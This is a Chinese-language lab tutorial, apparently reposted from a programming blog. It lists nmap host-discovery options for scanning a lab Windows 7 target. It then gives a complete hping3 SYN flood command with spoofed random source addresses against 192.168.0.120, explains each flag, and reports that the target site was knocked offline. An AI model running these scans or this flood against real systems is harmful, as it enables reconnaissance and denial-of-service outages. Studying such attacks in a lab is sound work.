本文章仅供学习交流
一.环境配置
二.信息收集
1.Traceroute 命令也可以对路由进行跟踪

2.使用nmap扫描win7进行信息收集
nmap 目标ip --exclude 排除目标ip 扫描时排除指定ip nmap -iL 目标文件 扫描指定文件夹的ip nmap -iR 目标数量 随机扫描指定iP数量 nmap -sn 目标 只探测主机是否存活,不对端口和其他信息进行扫描 nmap -sn -PR 目标 通过ARP协议扫描主机是否存活 nmap -PE 目标 过程上和ping命令无异 nmap -PP 目标 通过ICMP协议的时间戳的方式发现主机是否存活 nmap -PM 目标 通过ICMP协议的地址掩码发现主机 nmap -PS [端口,端口,端口...] 目标 通过TCP协议来扫描主机是否存活(全连接扫描) nmap -PU 目标 通过UDP方式扫描 nmap --data-length 25 目标 通过参数--data--length 25 来发生随机数据包 nmap --packet-trace 目标 追踪nmap发送的数据包
systemctl start httpd //开启apache服务 systemctl stop firewalld.service //关闭防火墙

2.启动kali使用hping命令对靶机进行压力测试
┌──(root?kali)-[~/桌面] └─# hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.0.120 -c 1000 = 发送的数据包的数量。 -d 120 = 发送到目标机器的每个数据包的大小。单位是字节 -S = 只发送 SYN 数据包。 -w 64 = TCP 窗口大小。 -p 80 = 目的地端口(80 是 WEB 端口)。你在这里可以使用任何端口。 --flood = 尽可能快地发送数据包,不需要考虑显示入站回复。洪水攻击模式。 --rand-source = 使用随机性的源头 IP 地址。这里的伪造的 IP 地址,只是在局域中伪造。通过路 由器后,还会还原成真实的 IP 地址。
3.重新访问网站,发现网站变慢了,当我们把-c的数据改大些的时候过一会就会发现网站被干崩了,就达到了我SYN洪水攻击的目的了。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/209332.html原文链接:https://javaforall.net
